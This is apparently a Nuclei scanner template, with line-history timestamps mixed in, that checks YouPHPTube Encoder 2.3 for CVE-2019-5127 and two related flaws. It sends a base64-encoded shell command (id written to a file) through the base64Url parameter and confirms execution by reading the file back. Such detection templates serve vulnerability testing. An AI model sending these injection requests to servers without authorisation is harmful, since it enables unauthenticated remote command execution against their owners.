2021-02-10 11:03:39 +00:00
id : CVE-2019-5127
info :
2022-05-09 16:12:52 +00:00
name : YouPHPTube Encoder 2.3 - Remote Command Injection
2021-02-10 11:03:39 +00:00
author : pikpikcu
severity : critical
2022-05-09 16:12:52 +00:00
description : "YouPHPTube Encoder 2.3 is susceptible to a command injection vulnerability which could allow an attacker to compromise the server. These exploitable unauthenticated command injections exist via the parameter base64Url in /objects/getImage.php."
2022-04-22 10:38:41 +00:00
reference :
- https://talosintelligence.com/vulnerability_reports/TALOS-2019-0917
2022-05-09 16:12:52 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-5127
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2019-5127
cwe-id : CWE-78
2022-04-22 10:38:41 +00:00
tags : cve,cve2019,rce
2021-02-10 11:03:39 +00:00
requests :
- method : GET
path :
2021-03-11 16:09:36 +00:00
- "{{BaseURL}}/objects/getImage.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=png" # CVE-2019-5127
- "{{BaseURL}}/objects/getImageMP4.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg" # CVE-2019-5128
- "{{BaseURL}}/objects/getSpiritsFromVideo.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg" # CVE-2019-5129
2021-02-10 11:03:39 +00:00
headers :
Content-Type : application/x-www-form-urlencoded
- method : GET
path :
- "{{BaseURL}}/objects/nuclei.txt"
headers :
Content-Type : application/x-www-form-urlencoded
matchers-condition : and
matchers :
2021-03-04 15:23:55 +00:00
- type : word
words :
- "uid="
- "gid="
- "groups="
2021-02-10 11:03:39 +00:00
condition : and
2021-03-04 15:23:55 +00:00
part : body
- type : word
words :
- text/plain
part : header
2021-02-10 11:03:39 +00:00
- type : status
status :
- 200
2022-05-09 16:12:52 +00:00
# Enhanced by mp on 2022/05/03